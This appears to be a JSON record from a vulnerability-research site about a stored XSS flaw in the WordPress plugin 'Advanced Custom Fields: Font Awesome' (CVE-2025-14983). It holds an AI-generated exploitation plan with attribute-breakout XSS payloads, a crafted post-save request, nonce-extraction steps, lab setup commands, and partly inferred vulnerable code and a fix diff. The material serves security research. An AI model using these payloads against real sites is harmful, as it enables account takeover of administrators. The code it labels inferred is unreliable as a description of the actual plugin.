[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f0YQMy647VrbSFY_5qqeBkOpTYV20ZGUEG_t72Cg7WyI":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-14983","advanced-custom-fields-font-awesome-authenticated-contributor-stored-cross-site-scripting","Advanced Custom Fields: Font Awesome \u003C= 5.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting","The Advanced Custom Fields: Font Awesome Field plugin for WordPress is vulnerable to Cross-Site Scripting in all versions up to, and including, 5.0.1 due to insufficient input sanitization and output escaping. 
This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts that execute in a victim's browser.","advanced-custom-fields-font-awesome",null,"\u003C=5.0.1","5.0.2","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-18 00:00:00","2026-02-19 04:36:23",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fc495d7f6-6d4a-4b1a-90f9-5273e7773d7a?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2025-14983 (Advanced Custom Fields: Font Awesome Field)\n\n## 1. Vulnerability Summary\nThe **Advanced Custom Fields: Font Awesome Field** plugin (versions \u003C= 5.0.1) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The vulnerability exists because the plugin fails to sanitize or escape the value of Font Awesome field inputs when they are rendered in the WordPress administrative interface (post editor) or on the frontend. Since a user with Contributor-level permissions can create or edit posts and set ACF field values, they can inject malicious JavaScript into the database, which will then execute in the context of any user (including Administrators) who views the affected post.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fpost.php` (Standard WordPress post update) or `wp-admin\u002Fadmin-ajax.php` (ACF AJAX saves).\n- **Vulnerable Parameter:** The `acf[field_xxxxxxxxxxxx]` parameter, where `xxxxxxxxxxxx` is the unique key of a Font Awesome field.\n- **Authentication Level:** Authenticated, **Contributor+** (Contributor, Author, Editor, or Admin).\n- **Preconditions:** \n    1. The plugin `advanced-custom-fields-font-awesome` must be active.\n    2. 
An ACF Field Group containing a \"Font Awesome\" field must be created and assigned to a post type that the attacker can edit (e.g., 'Post').\n\n## 3. Code Flow (Inferred)\n1. **Input:** A Contributor edits a post. The request contains the ACF field data: `acf[field_key]=payload`.\n2. **Storage:** ACF processes the field and calls the plugin's `update_value()` method (inherited or overridden). The unsanitized payload is stored in the `wp_postmeta` table.\n3. **Render (Admin):** When an Administrator edits the same post, the plugin's `render_field()` method (within the `acf_field_font_awesome` class) is called to display the current selection. The value is retrieved and echoed into the HTML, likely inside a class attribute or a data attribute, without using `esc_attr()` or `esc_html()`.\n4. **Render (Frontend):** When a user views the post, `the_field()` or `get_field()` calls `format_value()`. If the developer outputs this value directly (e.g., `\u003Ci class=\"\u003C?php the_field('icon'); ?>\">\u003C\u002Fi>`), and the plugin didn't sanitize on save, XSS occurs.\n\n## 4. Nonce Acquisition Strategy\nTo exploit this as a Contributor, we must be able to save post data. WordPress uses the `_wpnonce` for the `editpost` action.\n\n1. **Create an ACF Field Group:** Use WP-CLI to programmatically create a field group and a Font Awesome field attached to \"Posts\".\n2. **Login as Contributor:** Use the `browser_navigate` tool to log in as a user with the `contributor` role.\n3. **Get Nonce & Field Key:**\n   - Navigate to `wp-admin\u002Fpost-new.php`.\n   - Use `browser_eval` to extract:\n     - The `_wpnonce` from the form: `document.querySelector('#_wpnonce').value`.\n     - The ACF field key for the Font Awesome field from the page source: `document.querySelector('.acf-field[data-type=\"font-awesome\"]').getAttribute('data-key')`.\n\n## 5. Exploitation Strategy\n### Step 1: Payload Construction\nWe need to break out of an HTML attribute. 
Since the value is likely injected into a class or data attribute of an icon tag:\n**Payload:** `\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>` or `\">\u003Cimg src=x onerror=alert(1)>`\n\n### Step 2: Injection (Contributor)\nSubmit a POST request to update a post with the payload.\n\n- **Request Type:** `POST`\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php`\n- **Content-Type:** `application\u002Fx-www-form-urlencoded`\n- **Body:**\n  ```text\n  _wpnonce=[NONCE]&\n  action=editpost&\n  post_ID=[POST_ID]&\n  post_title=XSS_Test&\n  acf[[FIELD_KEY]]=\">\u003Cimg src=x onerror=alert(document.domain)>\n  ```\n\n### Step 3: Trigger (Admin)\n1. Log in as an Administrator.\n2. Navigate to the \"All Posts\" page or directly to the edit page for the `POST_ID` used in Step 2.\n3. The script will execute when the ACF field preview or the post content is rendered.\n\n## 6. Test Data Setup\n1. **Install Plugin:** Ensure `advanced-custom-fields-font-awesome` version 5.0.1 is installed.\n2. **Create User:** `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n3. **Create ACF Field Group:**\n   ```bash\n   # Create the field group\n   GROUP_ID=$(wp post create --post_type=acf-field-group --post_title=\"Font Group\" --post_status=publish --porcelain)\n   \n   # Create the Font Awesome field within that group\n   wp post create --post_type=acf-field --post_parent=$GROUP_ID --post_title=\"My Icon\" --post_excerpt=\"my_icon_field\" --post_status=publish --post_content='a:10:{s:4:\"type\";s:12:\"font-awesome\";s:12:\"instructions\";s:0:\"\";s:8:\"required\";i:0;s:17:\"conditional_logic\";i:0;s:7:\"wrapper\";a:3:{s:5:\"width\";s:0:\"\";s:5:\"class\";s:0:\"\";s:2:\"id\";s:0:\"\";}s:13:\"default_value\";s:0:\"\";s:8:\"save_as\";s:5:\"class\";s:12:\"font_awesome\";s:1:\"4\";s:11:\"enqueue_fa\";i:1;s:12:\"styling_type\";s:7:\"default\";}'\n   \n   # Note: The key is usually field_[unique_id]. 
We can find it after creation.\n   FIELD_KEY=$(wp post meta list $(wp post list --post_type=acf-field --post_title=\"My Icon\" --format=ids) --filter=field_key --field=meta_value)\n   ```\n4. **Create Target Post:** `POST_ID=$(wp post create --post_type=post --post_title=\"Target Post\" --post_author=$(wp user get attacker --field=ID) --post_status=publish --porcelain)`\n\n## 7. Expected Results\n- When the Administrator edits the `POST_ID`, the HTML rendered by the plugin will look like:\n  `\u003Cdiv ... data-value=\"\">\u003Cimg src=x onerror=alert(document.domain)>\" ...>`\n- An alert box showing the domain will appear in the Admin's browser.\n\n## 8. Verification Steps\n1. **Database Check:** Verify the meta value is stored in its raw form:\n   `wp post meta get [POST_ID] my_icon_field`\n   Should return: `\">\u003Cimg src=x onerror=alert(document.domain)>`\n2. **HTML Response Check:** Use `http_request` to fetch the admin edit page and grep for the payload:\n   `http_request GET http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php?post=[POST_ID]&action=edit` (as Admin)\n   Confirm the payload exists unescaped in the response body.\n\n## 9. Alternative Approaches\n- **ACF Settings Injection:** If the field name or labels are also unescaped, XSS can be achieved by an Editor\u002FAdmin modifying the ACF Field Group settings.\n- **Icon Set Bypass:** If the plugin uses a dropdown to select icons, the attacker might intercept the request and replace the selected icon class with the XSS payload.\n- **Frontend Trigger:** If the theme uses `the_field('my_icon_field')` in a template, navigate to the public post URL to trigger the XSS. (Standard ACF usage).","The Advanced Custom Fields: Font Awesome Field plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Font Awesome field value in versions up to 5.0.1. 
Authenticated attackers with Contributor-level access or higher can inject arbitrary JavaScript by saving a malicious payload in the field, which executes when an administrator or other user views the post in the editor or on the frontend.","\u002F\u002F Inferred from plugin structure: fields\u002Facf-font-awesome-v5.php or similar\n\u002F\u002F Likely within the render_field method of the acf_field_font_awesome class\n\nfunction render_field( $field ) {\n    \u002F\u002F ... (truncated)\n    $value = $field['value'];\n    $name = $field['name'];\n\n    \u002F\u002F Vulnerable rendering of stored value without escaping\n    echo '\u003Cdiv class=\"acf-font-awesome-field-wrapper\" data-value=\"' . $value . '\">';\n    echo '\u003Cinput type=\"hidden\" name=\"' . $name . '\" value=\"' . $value . '\" \u002F>';\n    \u002F\u002F ... (truncated)\n}\n\n---\n\n\u002F\u002F Likely within the format_value method affecting frontend display\n\nfunction format_value( $value, $post_id, $field ) {\n    \u002F\u002F If the plugin returns the raw string for use in templates\n    return $value;\n}","--- a\u002Ffields\u002Facf-font-awesome-v5.php\n+++ b\u002Ffields\u002Facf-font-awesome-v5.php\n@@ -120,7 +120,7 @@\n     $value = $field['value'];\n     $name = $field['name'];\n \n-    echo '\u003Cdiv class=\"acf-font-awesome-field-wrapper\" data-value=\"' . $value . '\">';\n-    echo '\u003Cinput type=\"hidden\" name=\"' . $name . '\" value=\"' . $value . '\" \u002F>';\n+    echo '\u003Cdiv class=\"acf-font-awesome-field-wrapper\" data-value=\"' . esc_attr($value) . '\">';\n+    echo '\u003Cinput type=\"hidden\" name=\"' . esc_attr($name) . '\" value=\"' . esc_attr($value) . '\" \u002F>';\n \n function update_value( $value, $post_id, $field ) {\n-    return $value;\n+    return sanitize_text_field($value);\n }","The exploit is achieved by an authenticated user with at least Contributor permissions who has the ability to edit posts where an ACF Font Awesome field is present. \n\n1. 
The attacker logs into the WordPress dashboard and navigates to the 'Post' editor for a new or existing post.\n2. The attacker identifies the ACF field key for the Font Awesome field (e.g., `acf[field_63e...]`) by inspecting the page source or using developer tools.\n3. The attacker intercepts the post save request (editpost) or submits a request directly to `wp-admin\u002Fpost.php` containing a payload designed to break out of HTML attributes, such as: `\">\u003Cimg src=x onerror=alert(document.domain)>`.\n4. Because the plugin fails to sanitize this input upon saving and fails to escape it upon rendering, the payload is stored in the `wp_postmeta` table.\n5. When an administrator views the 'All Posts' list or edits the specific post, the malicious script executes within their browser session, potentially allowing for session hijacking or further administrative actions.","gemini-3-flash-preview","2026-04-19 04:42:19","2026-04-19 04:44:07",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","5.0.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-custom-fields-font-awesome\u002Ftags\u002F5.0.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fadvanced-custom-fields-font-awesome.5.0.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-custom-fields-font-awesome\u002Ftags\u002F5.0.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fadvanced-custom-fields-font-awesome.5.0.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-custom-fields-font-awesome\u002Ftags"]